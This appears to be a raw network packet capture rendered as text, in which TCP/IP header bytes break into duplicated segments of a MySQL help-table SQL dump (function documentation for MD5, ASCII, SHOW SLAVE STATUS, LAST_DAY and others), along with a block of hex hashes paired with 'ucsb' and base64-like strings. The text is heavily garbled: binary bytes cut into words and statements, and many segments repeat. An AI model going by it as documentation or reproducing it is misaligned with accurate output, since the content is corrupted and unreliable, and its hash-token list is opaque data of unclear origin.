1) |\n+----------------------------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER privilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULLC ZZ0`BiEL@/go0AE44@@K 3 Pf't+ ) ܌C ZZ0`BiEL@/o0AE4@@%  P2jQd  HcUCbbBi0`ET@/p܂Ao0E<@?Lr  3PW*tڀ 41 (.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10-04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n','mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECbb0`BiET@/Ԁo0SE<@@Kr  3PW*tڀ 41 (.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10-04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n','mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECJbbBi0`ET@/p܂Ao0E<@?Lq  3PW/tڀ { (CT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer division.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue this statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relC]bb0`BiET@/Ԁo0SE<@@Kq  3PW/tڀ { (CT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer division.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue this statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relCbbBi0`ET@/p܂Ao0E<@?Lp  3PW5tڀ &6 (ay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyISAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the number of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECCZZBi0`EL@/܂Sŀo0E46@?I 3 P v't  ) ܌Cbb0`BiET@/Ԁo0SE<@@Kp  3PW5tڀ &6 (ay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyISAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the number of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECCZZ0`BiEL@/go0AE46@@I 3 P v't  ) ܌CbbBi0`ET@/p܂Ao0E<@?Lo  3PW: tڀ x (T 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for\nNOW().\n','',''),(181,'ADDDATE',14,' ADDDATE(date,INTERVAL expr type)\n ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nADDDATE() is a synonym for DATE_ADD(). The related\nfunction SUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byteC%bb0`BiET@/Ԁo0SE<@@Ko  3PW: tڀ x (T 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for\nNOW().\n','',''),(181,'ADDDATE',14,' ADDDATE(date,INTERVAL expr type)\n ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument,\nADDDATE() is a synonym for DATE_ADD(). The related\nfunction SUBDATE() is a synonym for DATE_SUB().\nFor information on the INTERVAL argument, see the\ndiscussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byteCbbBi0`ET@/أ  o0E<| @?  PeZ>̀  ^bTV47ZCUD55egUzA==
233CE4E167470E6567195C8C14822685,ucsb,MTNzEwEDA3L3VOt68jVWjjtQSpZ5X8lawXYyYQ==
8FD6E033E7961E65ACF4A669D94C6484,ucsb,MTNzEwEDA3N4T9DvIHr9C7gCALbUHdRK9IadCQ==
2F4DC4610D51FA185464454873E1ACFD,ucsb,MTNzEwEDA3TXHv1crp9HPXTYxtbIveAtYJTRLg==
D3EACD2841CAF6D67EABD72A9A62283E,ucsb,MTNzEwEDA3W0/7gzCEZ6xXiHteQxjvWmWH3lBQ==
7C52FD2DD4A10C49403F1D419D2C19D4,ucsb,MTNzEwEDA3Z7Z6ry1yTYSRKXSI6jV3dWi5Vk3g==
651533E29AFE5C2960669459177154FA,ucsb,MTNzEwEDA3cGsoPIYScEgtliWPwHc3Jkwg+oDQ==
32E58B8281BBDC7B294828402A025475,ucsb,MTNzEwEDA3joMLj50Rjph2tzKjsvcftlopQNzA==
225BC6E2035CC502FD74ADFEC1FAE751,ucsb,MTNzEwEDA3lVsw8YhZTlJeRv4/nELMyDinG1RQ==
1666BB6EE7E9D858A7E12FA7309BB3A4,ucsb,MTNzEwEDA3rZkFlZ4BTP6UaQmuKi3ZcV6qqy+Q==
BF595E75D203961FD0E881B41FFD2A2F,ucsb,MTNzEwEDA3vfmCAKVKszQhxkiGqQFlaJM7Ym/Q==
1EE1609E3F1F31E0BAA62BDC3D2B5E3B,ucsb,MTNzEwEDA3wZn+TM4Pa28+7qNvc+8Li2UfnZ2g==
3BD37607F487742DC0CA66A7BFA6268E,ucsb,MTNzEwEDA333+Z2ecH+/y8PbjGO3Gto3Rmayvw==
52FF023A604ED86B24DF10D8A1D527C2,ucsb,MTNzEwEDA37xmgzf+7cfa3PbMhnrgCa9hJvdoA==
48090120125589601CB39D3FEA9F4E4D,ucsb,MTNzEwEDA3+WKIZSp3jc1kjq+HBvtnWpUQNmQg==
2CF8009AB4EDE1AC918F3F7AEFD75E61,ucsb,MTNzEwEDA4CtoerAVXFK5QwrCWpF7imMTRGoGA==
D7E51DE11F4D989E8E31FCZZBi0`EL@/܂Sŀo0E48@?G 3 P't ) ܌Cbb0`BiET@/o0AE<| @@  PeZ>̀  ^bTV47ZCUD55egUzA==
233CE4E167470E6567195C8C14822685,ucsb,MTNzEwEDA3L3VOt68jVWjjtQSpZ5X8lawXYyYQ==
8FD6E033E7961E65ACF4A669D94C6484,ucsb,MTNzEwEDA3N4T9DvIHr9C7gCALbUHdRK9IadCQ==
2F4DC4610D51FA185464454873E1ACFD,ucsb,MTNzEwEDA3TXHv1crp9HPXTYxtbIveAtYJTRLg==
D3EACD2841CAF6D67EABD72A9A62283E,ucsb,MTNzEwEDA3W0/7gzCEZ6xXiHteQxjvWmWH3lBQ==
7C52FD2DD4A10C49403F1D419D2C19D4,ucsb,MTNzEwEDA3Z7Z6ry1yTYSRKXSI6jV3dWi5Vk3g==
651533E29AFE5C2960669459177154FA,ucsb,MTNzEwEDA3cGsoPIYScEgtliWPwHc3Jkwg+oDQ==
32E58B8281BBDC7B294828402A025475,ucsb,MTNzEwEDA3joMLj50Rjph2tzKjsvcftlopQNzA==
225BC6E2035CC502FD74ADFEC1FAE751,ucsb,MTNzEwEDA3lVsw8YhZTlJeRv4/nELMyDinG1RQ==
1666BB6EE7E9D858A7E12FA7309BB3A4,ucsb,MTNzEwEDA3rZkFlZ4BTP6UaQmuKi3ZcV6qqy+Q==
BF595E75D203961FD0E881B41FFD2A2F,ucsb,MTNzEwEDA3vfmCAKVKszQhxkiGqQFlaJM7Ym/Q==
1EE1609E3F1F31E0BAA62BDC3D2B5E3B,ucsb,MTNzEwEDA3wZn+TM4Pa28+7qNvc+8Li2UfnZ2g==
3BD37607F487742DC0CA66A7BFA6268E,ucsb,MTNzEwEDA333+Z2ecH+/y8PbjGO3Gto3Rmayvw==
52FF023A604ED86B24DF10D8A1D527C2,ucsb,MTNzEwEDA37xmgzf+7cfa3PbMhnrgCa9hJvdoA==
48090120125589601CB39D3FEA9F4E4D,ucsb,MTNzEwEDA3+WKIZSp3jc1kjq+HBvtnWpUQNmQg==
2CF8009AB4EDE1AC918F3F7AEFD75E61,ucsb,MTNzEwEDA4CtoerAVXFK5QwrCWpF7imMTRGoGA==
D7E51DE11F4D989E8E31FCZZ0`BiEL@/go0AE48@@G 3 P't ) ܌C bbBi0`ET@/p܂Ao0E< @?Ln  3PW?tڀ C ( code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a multi-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined by the corner points of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','',''),(185,'IS_FREE_LOCK',21,' IS_FREE_LOCK(str)\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock),\n0 if the lock is in use, and\nNULL on errors (such as incorrect arguments).\n','',''),(186,'SHOW BINLOG',6,'SHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in theC!bb0`BiET@/Ԁo0SE< @@Kn  3PW?tڀ C ( code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a multi-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined by the corner points of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','',''),(185,'IS_FREE_LOCK',21,' IS_FREE_LOCK(str)\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock),\n0 if the lock is in use, and\nNULL on errors (such as incorrect arguments).\n','',''),(186,'SHOW BINLOG',6,'SHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in theC!ZZBi0`EL@/u܂Io0E4L@?)  P2[qi =  ecqC"ZZ0`BiEL@/o0AE4L@@)  P2[qi =  ecqCR&bbBi0`ET@/p܂Ao0E< @?Lm  3PWDtڀ & ( binary log.\nIf you do not specify \'log_name\', the first binary log is displayed.\n','',''),(187,'TOUCHES',11,' Touches(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially touches\ng2. Two geometries /spatially touch/ if the interiors of\nthe geometries do not intersect, but the boundary of one of the geometries\nintersects either the boundary or the interior of the other.\n','',''),(188,'TIMESTAMPADD FUNCTION',14,'','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric value of the address.\nAddresses may be 4- or 8-byte addresses.\n','mysql> SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREMENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n Ce&bb0`BiET@/Ԁo0SE< @@Km  3PWDtڀ & ( binary log.\nIf you do not specify \'log_name\', the first binary log is displayed.\n','',''),(187,'TOUCHES',11,' Touches(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially touches\ng2. Two geometries /spatially touch/ if the interiors of\nthe geometries do not intersect, but the boundary of one of the geometries\nintersects either the boundary or the interior of the other.\n','',''),(188,'TIMESTAMPADD FUNCTION',14,'','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric value of the address.\nAddresses may be 4- or 8-byte addresses.\n','mysql> SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREMENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n C?)ZZBi0`EL@/܂Sŀo0E4:@?E 3 P't  ) CP)ZZ0`BiEL@/go0AE4:@@E 3 P't  ) C,,bbBi0`ET@/p܂Ao0E< @?Ll  3PWI!tڀ p~ ( (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRESS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geometric points,\nsuch as self-intersection or self-tangency. IsSimple() returns 0 if the\nargument is not simple, and -1 if it is NULL.\n\nThe description of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple.\n','',''),(193,'- BINARY',4,' -\nSubtraction:\n','mysql> SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srC?,bb0`BiET@/Ԁo0SE< @@Kl  3PWI!tڀ p~ ( (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRESS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geometric points,\nsuch as self-intersection or self-tangency. IsSimple() returns 0 if the\nargument is not simple, and -1 if it is NULL.\n\nThe description of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple.\n','',''),(193,'- BINARY',4,' -\nSubtraction:\n','mysql> SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srCB,ZZBi0`EL@/܂Sŀo0E4<@?C 3 P)'t ) CO,ZZ0`BiEL@/go0AE4<@@C 3 P)'t ) C0bbBi0`ET@/p܂Ao0E< @?Lk  3PWN)tڀ  (id])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DEFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer vC0bb0`BiET@/Ԁo0SE< @@Kk  3PWN)tڀ  (id])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DEFINITION',3,'The Well-Known Text (WKT) representation of Geometry is designed to\nexchange geometry data in ASCII form.\n','',''),(196,'CURRENT_TIME',14,' CURRENT_TIME\n CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for\nCURTIME().\n','',''),(197,'LAST_INSERT_ID',25,' LAST_INSERT_ID()\n LAST_INSERT_ID(expr)\nReturns the last automatically generated value that was inserted into\nan AUTO_INCREMENT column.\n','mysql> SELECT LAST_INSERT_ID();\n -> 195',''),(198,'LAST_DAY',14,' LAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for the\nlast day of the month. Returns NULL if the argument is invalid.\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL',''),(199,'MEDIUMINT',1,' MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-size integer. The signed range is -8388608 to\n8388607. The unsigned range is 0 to 16777215.\n','',''),(200,'FLOOR',4,' FLOOR(X)\nReturns the largest integer vCt5bbBi0`ET@/p܂Ao0E< @?Lj  3PWS1tڀ a (alue not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nMySQL explains how it would process the SELECT, providing\ninformation about how tables are joined and in which order.\n','EXPLAIN tbl_name',''),(204,'VARCHAR',1,' [NATIONAL] VARCHAR(M) [BINARY]\n\nA variable-length string. M represents the maximum column length.\nThe range of M is 1 to 255 before MySQL 4.0.2, 0 to 255 as of MySQL\n4.0.2, and 0 to 65,535 as of MySQL 5.0.3. (The maximum actual length of a\nVARCHAR in MySQL 5.0 is determined by the maximum row size and the\ncharacter set you use. The maximC5bb0`BiET@/Ԁo0SE< @@Kj  3PWS1tڀ a (alue not greater than X.\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2',''),(201,'RTRIM',23,' RTRIM(str)\nReturns the string str with trailing space characters removed.\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'',''),(202,'DEGREES',4,' DEGREES(X)\nReturns the argument X, converted from radians to degrees.\n','mysql> SELECT DEGREES(PI());\n -> 180.000000',''),(203,'EXPLAIN',6,'The EXPLAIN statement can be used either as a synonym for\nDESCRIBE or as a way to obtain information about how MySQL executes\na SELECT statement:\n\n --- The EXPLAIN tbl_name syntax is synonymous with DESCRIBE tbl_name\nor\nSHOW COLUMNS FROM tbl_name.\n --- When you precede a SELECT statement with the keyword EXPLAIN,\nMySQL explains how it would process the SELECT, providing\ninformation about how tables are joined and in which order.\n','EXPLAIN tbl_name',''),(204,'VARCHAR',1,' [NATIONAL] VARCHAR(M) [BINARY]\n\nA variable-length string. M represents the maximum column length.\nThe range of M is 1 to 255 before MySQL 4.0.2, 0 to 255 as of MySQL\n4.0.2, and 0 to 65,535 as of MySQL 5.0.3. (The maximum actual length of a\nVARCHAR in MySQL 5.0 is determined by the maximum row size and the\ncharacter set you use. The maximC:ZZBi0`EL@/܂Sŀo0E4>@? 3 